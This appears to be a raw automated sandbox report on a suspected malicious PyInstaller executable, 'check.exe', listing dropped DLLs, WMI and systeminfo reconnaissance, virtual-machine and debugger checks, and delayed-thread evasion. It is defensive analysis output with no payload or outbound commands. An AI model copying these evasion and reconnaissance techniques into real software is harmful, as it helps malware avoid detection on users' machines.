Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI79922\python3.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI79922\PyQt5\Qt5\plugins\platforms\qwindows.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI44602\PyQt5\Qt5\plugins\styles\qwindowsvistastyle.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI44602\PyQt5\Qt5\bin\opengl32sw.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI79922\select.pydJump to dropped file
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI80762\_queue.pydJump to dropped file
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI79922\PyQt5\Qt5\plugins\styles\qwindowsvistastyle.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI80762\PyQt5\Qt5\plugins\imageformats\qwbmp.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI80762\PyQt5\Qt5\plugins\imageformats\qico.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI79922\_lzma.pydJump to dropped file
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI80762\PyQt5\Qt5\plugins\imageformats\qsvg.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI79922\PyQt5\Qt5\bin\Qt5WebSockets.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI79922\PyQt5\Qt5\plugins\platforms\qminimal.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI80762\PyQt5\Qt5\plugins\styles\qwindowsvistastyle.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI79922\PyQt5\Qt5\plugins\platforms\qwebgl.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI79922\_decimal.pydJump to dropped file
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI44602\PyQt5\Qt5\plugins\imageformats\qtiff.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI80762\charset_normalizer\md.cp313-win_amd64.pydJump to dropped file
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI44602\PyQt5\Qt5\bin\Qt5DBus.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI44602\_queue.pydJump to dropped file
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI44602\_socket.pydJump to dropped file
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI79922\PyQt5\Qt5\plugins\imageformats\qgif.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI79922\charset_normalizer\md.cp313-win_amd64.pydJump to dropped file
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI79922\python313.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI80762\_socket.pydJump to dropped file
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI80762\_wmi.pydJump to dropped file
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI80762\PyQt5\Qt5\plugins\imageformats\qtga.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI80762\PyQt5\Qt5\plugins\iconengines\qsvgicon.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI80762\PyQt5\Qt5\bin\Qt5Network.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI80762\PyQt5\Qt5\plugins\imageformats\qwebp.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI44602\PyQt5\Qt5\bin\Qt5WebSockets.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI79922\PyQt5\Qt5\plugins\platformthemes\qxdgdesktopportal.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI79922\PyQt5\sip.cp313-win_amd64.pydJump to dropped file
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI44602\PyQt5\Qt5\bin\Qt5Quick.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI79922\PyQt5\Qt5\bin\Qt5Quick.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI44602\_hashlib.pydJump to dropped file
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI44602\psutil\_psutil_windows.pydJump to dropped file
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI44602\PyQt5\Qt5\plugins\imageformats\qjpeg.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI80762\_ssl.pydJump to dropped file
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI44602\PyQt5\Qt5\plugins\imageformats\qtga.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI44602\PyQt5\Qt5\plugins\platforms\qminimal.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI79922\_ctypes.pydJump to dropped file
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI80762\PyQt5\Qt5\bin\d3dcompiler_47.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI79922\PyQt5\Qt5\plugins\platforms\qoffscreen.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI79922\PyQt5\Qt5\plugins\imageformats\qsvg.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI79922\psutil\_psutil_windows.pydJump to dropped file
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI44602\_lzma.pydJump to dropped file
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI44602\PyQt5\Qt5\bin\Qt5Network.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI44602\PyQt5\Qt5\plugins\imageformats\qicns.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI80762\python313.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI79922\PyQt5\Qt5\bin\Qt5Qml.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI44602\PyQt5\Qt5\plugins\imageformats\qsvg.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI80762\PyQt5\Qt5\bin\opengl32sw.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI44602\PyQt5\Qt5\bin\libEGL.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI44602\_ssl.pydJump to dropped file
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI44602\PyQt5\QtWidgets.pydJump to dropped file
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI79922\PyQt5\Qt5\plugins\imageformats\qtiff.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI44602\PyQt5\Qt5\bin\Qt5QmlModels.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI79922\_ssl.pydJump to dropped file
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI44602\PyQt5\Qt5\plugins\imageformats\qico.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI44602\charset_normalizer\md__mypyc.cp313-win_amd64.pydJump to dropped file
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI44602\PyQt5\Qt5\bin\Qt5Svg.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI79922\PyQt5\Qt5\bin\opengl32sw.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI80762\PyQt5\Qt5\bin\libGLESv2.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI80762\PyQt5\Qt5\plugins\platformthemes\qxdgdesktopportal.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI80762\PyQt5\Qt5\bin\Qt5DBus.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI80762\PyQt5\QtGui.pydJump to dropped file
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI80762\_bz2.pydJump to dropped file
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI44602\PyQt5\Qt5\bin\libGLESv2.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI80762\PyQt5\Qt5\plugins\generic\qtuiotouchplugin.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI44602\charset_normalizer\md.cp313-win_amd64.pydJump to dropped file
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI80762\PyQt5\QtWidgets.pydJump to dropped file
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI80762\PyQt5\Qt5\bin\Qt5QmlModels.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI44602\python313.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI80762\_decimal.pydJump to dropped file
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI80762\PyQt5\Qt5\bin\Qt5Qml.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI79922\PyQt5\QtWidgets.pydJump to dropped file
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI80762\PyQt5\Qt5\plugins\platforms\qwindows.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI44602\PyQt5\QtGui.pydJump to dropped file
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI44602\_ctypes.pydJump to dropped file
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI80762\PyQt5\Qt5\plugins\platforms\qwebgl.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI79922\PyQt5\QtCore.pydJump to dropped file
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI79922\PyQt5\Qt5\bin\libGLESv2.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI79922\_bz2.pydJump to dropped file
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI79922\PyQt5\Qt5\plugins\imageformats\qjpeg.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI44602\PyQt5\Qt5\plugins\iconengines\qsvgicon.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI44602\select.pydJump to dropped file
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI80762\_ctypes.pydJump to dropped file
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI79922\PyQt5\Qt5\plugins\imageformats\qicns.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI80762\select.pydJump to dropped file
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI80762\PyQt5\Qt5\plugins\imageformats\qgif.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI79922\_hashlib.pydJump to dropped file
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI79922\PyQt5\Qt5\bin\Qt5QmlModels.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI79922\PyQt5\Qt5\plugins\imageformats\qtga.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI44602\_bz2.pydJump to dropped file
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI79922\PyQt5\Qt5\bin\d3dcompiler_47.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeCheck user administrative privileges: GetTokenInformation,DecisionNodesgraph_4-18165
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7940Thread sleep time: -14757395258967632s >= -30000sJump to behavior
Source: C:\Windows\System32\systeminfo.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
Source: C:\Windows\System32\systeminfo.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
Source: C:\Windows\System32\systeminfo.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_ComputerSystem
Source: C:\Windows\System32\wbem\WMIC.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT Manufacturer FROM Win32_ComputerSystem
Source: C:\Windows\System32\wbem\WMIC.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT Manufacturer FROM Win32_ComputerSystem
Source: C:\Windows\System32\wbem\WMIC.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT Manufacturer FROM Win32_ComputerSystem
Source: C:\Windows\System32\systeminfo.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\System32\systeminfo.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\System32\systeminfo.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\System32\systeminfo.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\System32\systeminfo.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\System32\systeminfo.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeCode function: 4_2_00007FF60B1283C0 FindFirstFileW,RemoveDirectoryW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,4_2_00007FF60B1283C0
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeCode function: 4_2_00007FF60B129280 FindFirstFileExW,FindClose,4_2_00007FF60B129280
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeCode function: 4_2_00007FF60B141874 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,4_2_00007FF60B141874
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeCode function: 5_2_00007FF60B129280 FindFirstFileExW,FindClose,5_2_00007FF60B129280
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.iniJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\userJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppDataJump to behavior
Source: check.exe, 00000005.00000003.1692495306.000001FA7C841000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW{
Source: check.exe, 00000005.00000002.2218577759.000001FA7C492000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll'
Source: check.exe, 00000005.00000002.2219688111.000001FA7CA90000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: L8fQEMU
Source: check.exe, 00000005.00000002.2231577333.00007FFB018E8000.00000008.00000001.01000000.00000024.sdmpBinary or memory string: .?AVQEmulationPaintEngine@@
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeCode function: 4_2_00007FF60B12D12C IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,4_2_00007FF60B12D12C
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeCode function: 4_2_00007FF60B143480 GetProcessHeap,4_2_00007FF60B143480
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeProcess token adjusted: DebugJump to behavior
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeProcess token adjusted: DebugJump to behavior
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeCode function: 4_2_00007FF60B12D30C SetUnhandledExceptionFilter,4_2_00007FF60B12D30C
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeCode function: 4_2_00007FF60B12C8A0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,4_2_00007FF60B12C8A0
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeCode function: 4_2_00007FF60B12D12C IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,4_2_00007FF60B12D12C
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeCode function: 4_2_00007FF60B13A614 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,4_2_00007FF60B13A614
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeCode function: 14_2_00007FFAFDF265D0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,14_2_00007FFAFDF265D0
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Roaming\HseeHuht\check.exe "C:\Users\user\AppData\Roaming\HseeHuht\check.exe" Jump to behavior
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeProcess created: C:\Users\user\AppData\Roaming\HseeHuht\check.exe "C:\Users\user\AppData\Roaming\HseeHuht\check.exe" Jump to behavior
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeProcess created: C:\Windows\System32\systeminfo.exe systeminfoJump to behavior
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic computersystem get manufacturer"Jump to behavior
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeProcess created: C:\Users\user\AppData\Roaming\HseeHuht\check.exe "C:\Users\user\AppData\Roaming\HseeHuht\check.exe" Jump to behavior
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeProcess created: C:\Users\user\AppData\Roaming\HseeHuht\check.exe "C:\Users\user\AppData\Roaming\HseeHuht\check.exe" Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic computersystem get manufacturer
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeProcess created: C:\Windows\System32\systeminfo.exe systeminfo
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic computersystem get manufacturer"
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeProcess created: C:\Windows\System32\systeminfo.exe systeminfo
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic computersystem get manufacturer"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic computersystem get manufacturer
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic computersystem get manufacturer
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeCode function: 4_2_00007FF60B149570 cpuid 4_2_00007FF60B149570
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
